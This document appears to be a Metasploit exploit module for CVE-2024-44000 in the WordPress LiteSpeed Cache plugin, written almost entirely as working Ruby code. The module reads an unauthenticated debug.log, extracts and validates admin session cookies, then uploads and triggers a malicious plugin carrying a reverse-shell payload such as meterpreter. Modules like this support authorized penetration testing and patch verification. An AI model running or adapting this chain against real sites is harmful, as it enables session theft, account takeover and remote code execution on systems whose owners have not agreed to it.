WordPress LiteSpeed Cache Cookie Theft

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::Remote::HTTP::Wordpress  
include Msf::Exploit::FileDropper  
prepend Msf::Exploit::Remote::AutoCheck  
  
class DebugLogError < StandardError; end  
class WordPressNotOnline < StandardError; end  
class AdminCookieError < StandardError; end  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Wordpress LiteSpeed Cache plugin cookie theft',  
'Description' => %q{  
This module exploits an unauthenticated account takeover vulnerability in LiteSpeed Cache, a Wordpress plugin  
that currently has around 6 million active installations. In LiteSpeed Cache versions prior to 6.5.0.1, when  
the Debug Logging feature is enabled, the plugin will log admin cookies to the /wp-content/debug.log endpoint  
which is accessible without authentication. The Debug Logging feature in the plugin is not enabled by default.  
The admin cookies found in the debug.log can be used to upload and execute a malicious plugin containing a payload.  
},  
'Author' => [  
'Rafie Muhammad', # discovery  
'jheysel-r7' # module  
],  
'References' => [  
[ 'URL', 'https://patchstack.com/articles/critical-account-takeover-vulnerability-patched-in-litespeed-cache-plugin/'],  
[ 'CVE', '2024-44000']  
],  
'License' => MSF_LICENSE,  
'Privileged' => false,  
'Platform' => ['unix', 'linux', 'win', 'php'],  
'Arch' => [ARCH_PHP, ARCH_CMD],  
'Targets' => [  
[  
'PHP In-Memory',  
{  
'Platform' => 'php',  
'Arch' => ARCH_PHP  
# tested with php/meterpreter/reverse_tcp  
}  
],  
[  
'Unix In-Memory',  
{  
'Platform' => ['unix', 'linux'],  
'Arch' => ARCH_CMD  
# tested with cmd/linux/http/x64/meterpreter/reverse_tcp  
}  
],  
[  
'Windows In-Memory',  
{  
'Platform' => 'win',  
'Arch' => ARCH_CMD  
}  
],  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => '2024-09-04',  
'Notes' => {  
'Stability' => [ CRASH_SAFE, ],  
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS],  
'Reliability' => [ REPEATABLE_SESSION, ]  
}  
)  
)  
end  
  
def check  
@admin_cookie = get_valid_admin_cookie  
CheckCode::Vulnerable('Found and tested valid admin cookie, we can upload and execute a payload')  
rescue WordPressNotOnline => e  
return CheckCode::Unknown("This doesn't appear to be a WordPress site: #{e.class}, #{e}")  
rescue DebugLogError => e  
return CheckCode::Safe("#{e.class}, #{e}")  
rescue AdminCookieError => e  
return CheckCode::Safe("#{e.class}, #{e}")  
end  
  
def extract_cookies(debug_log)  
admin_cookies = []  
debug_log.each_line do |log_line|  
# 09/13/24 15:52:48.009 [192.168.65.1:58695 1 UNP] Cookie: wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1726415372%7C8dXTtGUqH8cjixS1ZU8k58iBmfXRK0xMHXgDZwgjPfn%7C4084023e82a4c58d574ddf33142b168ff5cb93446675ca8116fd32e1de2b8df7; wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1726415372%7C8dXTtGUqH8cjixS1ZU8k58iBmfXRK0xMHXgDZwgjPfn%7Cf6bb4d0fdca7b147f320472893374a063b095b550db3488f86e58b6c47e4ce4c  
match = log_line.match(/(wordpress(_logged_in)?_[a-f0-9]{32}=[^;]+)/)  
admin_cookies << match.captures.compact.join('; ') if match  
end  
admin_cookies  
end  
  
def verify_admin_cookie(admin_cookies)  
admin_cookies.each do |admin_cookie|  
res = send_request_cgi({  
'uri' => '/wp-admin/',  
'cookie' => admin_cookie  
})  
return admin_cookie if res&.code == 200  
end  
  
nil  
end  
  
def get_valid_admin_cookie  
raise WordPressNotOnline unless wordpress_and_online?  
  
res = send_request_cgi({  
'uri' => normalize_uri('wp-content', 'debug.log'),  
'method' => 'GET'  
})  
raise DebugLogError, 'There was no /wp-content/debug.log endpoint found on the target to pillage' unless res&.code == 200  
raise DebugLogError, 'There were no cookies found inside /wp-content/debug.log' unless res.body.include?('wordpress_logged_in')  
  
admin_cookies = extract_cookies(res.body)  
raise AdminCookieError, 'No admin cookies could be found in debug.log' if admin_cookies.blank?  
  
print_status('One or more potential admin cookies were found')  
  
admin_cookie = verify_admin_cookie(admin_cookies)  
raise AdminCookieError, 'Admin cookies were found but are invalid' unless admin_cookie  
  
admin_cookie  
end  
  
def exploit  
unless @admin_cookie  
begin  
@admin_cookie = get_valid_admin_cookie  
print_good('Found and tested valid admin cookie, we can upload and execute a payload')  
rescue WordPressNotOnline => e  
fail_with(Failure::NotFound, "#{e.class}, #{e}")  
rescue DebugLogError, AdminCookieError => e  
fail_with(Failure::UnexpectedReply, "#{e.class}, #{e}")  
end  
end  
  
print_status('Preparing payload...')  
plugin_name = Rex::Text.rand_text_alpha(10)  
payload_name = Rex::Text.rand_text_alpha(10).to_s  
payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")  
zip = generate_plugin(plugin_name, payload_name)  
  
print_status('Uploading payload...')  
  
uploaded = wordpress_upload_plugin(plugin_name, zip.pack, @admin_cookie)  
fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded  
  
print_status("Executing the payload at #{payload_uri}...")  
register_files_for_cleanup("#{payload_name}.php", "#{plugin_name}.php")  
register_dir_for_cleanup("../#{plugin_name}")  
send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' })  
end  
end  
`